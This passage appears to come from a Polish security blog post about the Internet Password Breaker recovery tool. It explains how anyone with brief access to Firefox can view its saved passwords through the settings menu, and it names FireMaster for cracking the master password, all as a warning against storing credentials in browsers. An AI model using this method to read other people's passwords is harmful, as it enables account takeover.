Z pewnością Internet Password Breaker może się więc przydać do zautomatyzowanego odzyskiwania haseł, ja jednak zachęcam do własnoręcznego odkrywania tajników poszczególnych aplikacji, co z pewnością niesie ze sobą znacznie większe walory edukacyjne. Spójrzmy przykładowo, w jak prosty sposób możliwe jest odczytanie haseł zapamiętanych w popularnym Firefoksie.

Osoba, która uzyska choćby chwilowy dostęp do naszej przeglądarki internetowej Firefox, może nie tylko swobodnie zalogować się na nasze konta w serwisach, do których hasła przechowujemy w przeglądarce, ale również może poznać nasze hasła! W tym celu wystarczy tylko, że intruz skorzysta z opcji Narzędzia / Opcje / Bezpieczeństwo / Zapamiętane hasła / Wyświetl hasła:

Oczywiście w przypadku obecności skonfigurowanego hasła głównego, tego rodzaju postępowanie nie przyniesie natychmiastowego efektu. Z pewnością jednak wielu internautów korzystających z (automatycznie przecież sugerowanego) zapamiętywania haseł nie korzysta z hasła głównego, którego skonfigurowanie wymaga jednak podjęcia celowego działania przez użytkownika. Poza tym, istnieją już programy zdolne do odzyskania tegoż hasła, w przypadku Firefoksa jest to przykładowo FireMaster.

Premiera programu Internet Password Breaker oraz powyższy przykład na to, w jak banalny sposób możliwe jest ręczne przechwycenie naszych poświadczeń przechowywanych przez popularne aplikacje, jest więc przede wszystkim świetną okazją do przypomnienia, że powierzanie danych logowania jakiejkolwiek aplikacji nie jest dobrym pomysłem. Hasła warto więc przechowywać jedynie we własnej pamięci. Chcąc jednak koniecznie odciążyć naszą pamięć, bezpieczniejsze od powierzenia naszego hasła przeglądarce internetowej może się okazać skorzystanie z przysłowiowej żółtej karteczki.

[źródło]